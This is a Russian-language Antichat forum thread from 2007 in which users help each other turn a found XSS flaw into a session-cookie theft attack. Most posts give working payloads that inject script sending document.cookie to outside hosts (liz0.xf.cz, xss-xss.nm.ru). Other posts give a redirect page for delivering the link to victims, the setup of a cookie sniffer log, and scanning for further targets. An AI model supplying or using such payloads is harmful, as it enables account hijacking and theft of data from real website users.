Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
01.02.2007, 20:21
|
|
Banned
Регистрация: 06.07.2006
Сообщений: 83
Провел на форуме:
644264
Репутация:
26
|
|
помогите с Xss
короче нашёл на сайте хсс и вот хочу спросить,как ссылку сделать?я так сделал,правильно ли?
site.com"><script>img=new Image();img.src="http://liz0.xf.cz/i.gif?"+document.cookie;</script>
и ещё,я так понял что там где site.com надо ставить ссылку той страница где я нашёл ХСС,так ли это?
|
|
|
01.02.2007, 23:07
|
|
Участник форума
Регистрация: 14.01.2006
Сообщений: 242
Провел на форуме:
2630617
Репутация:
245
|
|
да ты все верно понял но мне кажется лутше делай так:
1) site.com"><script%20src=http://xss-xss.nm.ru/js.js></script>
js.js
img=new Image();img.src="http://liz0.xf.cz/i.gif?"+document.cookie;
2) Или залей на какуюто страницу лутше index.htm
<script language="JavaScript">
document.location.href="http://site.com'><script%20src=http://xss-xss.nm.ru/js.js></script>";
</script>
кажысь так все у тебя получится
|
|
|
|
01.02.2007, 23:32
|
|
Banned
Регистрация: 06.07.2006
Сообщений: 83
Провел на форуме:
644264
Репутация:
26
|
|
да,я так пробывал тока вот чёто неприходили данные.На халявных хостах будет пахать?
|
|
|
|
02.02.2007, 00:13
|
|
Участник форума
Регистрация: 14.01.2006
Сообщений: 242
Провел на форуме:
2630617
Репутация:
245
|
|
должно ... если у тебя неполучится на фрее-хостах попробуй ачатовской сниффер.)
|
|
|
|
02.02.2007, 09:57
|
|
Banned
Регистрация: 06.07.2006
Сообщений: 83
Провел на форуме:
644264
Репутация:
26
|
|
а смотрите,я сделал себе снифф на ачате http://antichat.org/s/***/log.php
какой адресс замой картинки то?
и ещё,я вот ищу хсс спомощью проги Acunetix 4
и он находит хсс в "/",возможно ли её осуществить,если да то как?
Последний раз редактировалось Aerot1smo; 02.02.2007 в 10:17..
|
|
|
|
02.02.2007, 20:59
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789
Репутация:
227
|
|
попробуй так:
site.com"><script>img=new Image();img.src="http://liz0.xf.cz/i.gif?"+escape(document.cookie)</script>
|
|
|
|
07.02.2007, 11:35
|
|
Новичок
Регистрация: 29.01.2007
Сообщений: 2
Провел на форуме:
68469
Репутация:
0
|
|
Сообщение от o3,14um
попробуй так:
site.com"><script>img=new Image();img.src="http://liz0.xf.cz/i.gif?"+escape(document.cookie)</script>
Ребят скажите почему это не работает:
Вызов из ява-скрипта :
<script>
img = new Image();
img.src = "http://адрес/sniffer.gif?"+document.cookie;
</script>
пробовал так, создал файлик html, его содержание:
<br>
<br>
<a href="http://google.com">google</a><br>
<script>
img = new image();
img.src = "http://адрес/sniffer.gif?"+document.cookie;
</script>
<br>
На снифер ничего не приходит, почему скажите пожалуйста...Читал много, все одно и тоже, но не фига...снифер Kanickа...
|
|
|
|
07.02.2007, 19:41
|
|
Banned
Регистрация: 16.01.2007
Сообщений: 18
Провел на форуме:
62578
Репутация:
-20
|
|
Сообщение от Aerot1smo
короче нашёл на сайте хсс и вот хочу спросить,как ссылку сделать?я так сделал,правильно ли?
site.com"><script>img=new Image();img.src="http://liz0.xf.cz/i.gif?"+document.cookie;</script>
и ещё,я так понял что там где site.com надо ставить ссылку той страница где я нашёл ХСС,так ли это?
Только зачем страница с XSS где ты нашел, не пойму!?
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
